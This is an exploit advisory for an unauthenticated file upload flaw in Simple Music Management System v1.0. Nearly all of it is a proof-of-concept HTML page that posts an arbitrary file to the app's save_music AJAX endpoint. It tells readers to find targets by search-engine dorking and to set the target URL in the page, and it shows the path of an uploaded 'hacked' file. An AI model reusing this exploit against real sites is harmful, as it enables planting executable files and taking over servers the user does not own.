=============================================================================================================================================
| # Title : Simple Music Management System v1.0 Remote File Upload Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits) |
| # Vendor : https://www.kashipara.com/project/php/12978/music-management-system-in-php-php-project-source-code |
=============================================================================================================================================
POC :
[+] Dorking Ä°n Google Or Other Search Enggine.
[+] The following html code uploads a executable malicious file remotely .
[+] Go to the line 27.
[+] Set the target site link Save changes and apply .
[+] save code as poc.html .
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Music Upload Form</title>
<script src="https://code.jquery.com/jquery-3.6.0.min.js"></script>
</head>
<body>
<form id="manage-music" enctype="multipart/form-data">
<label for="cover-input">Cover:</label>
<input type="file" id="cover-input" name="cover" onchange="displayImgCover(this)">
<br>
<img id="cover" src="#" alt="Cover Preview" style="max-width: 200px; display:none;">
<br>
<input type="submit" value="Upload">
</form>
<script>
// Handle form submission with AJAX
$('#manage-music').submit(function(e){
e.preventDefault();
start_load(); // Placeholder for loader function
$.ajax({
url: 'http://127.0.0.1/music/ajax.php?action=save_music',
data: new FormData($(this)[0]),
cache: false,
contentType: false,
processData: false,
method: 'POST',
type: 'POST',
success: function(resp) {
if (resp == 1) {
alert_toast('Data successfully saved', "success");
setTimeout(function(){
end_load(); // Placeholder to stop loader
_redirect('http://127.0.0.1/music/index.php?page=music_list'); // Redirect to music list page
}, 2000);
}
}
});
});
// Function to display the selected image (cover preview)
function displayImgCover(input) {
if (input.files && input.files[0]) {
var reader = new FileReader();
reader.onload = function (e) {
$('#cover').attr('src', e.target.result).show(); // Show the image preview
};
reader.readAsDataURL(input.files[0]);
}
}
// Placeholder functions for loader and redirect
function start_load(){
console.log("Loading started...");
// Add your loading spinner code here
}
function end_load(){
console.log("Loading finished.");
// Add your code to stop the loading spinner here
}
function alert_toast(message, type){
alert(message); // Basic alert, replace with a toast library if needed
}
function _redirect(url){
window.location.href = url;
}
</script>
</body>
</html>
[+] http://127.0.0.1/music/assets/uploads/1726232340_hacked.txt
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================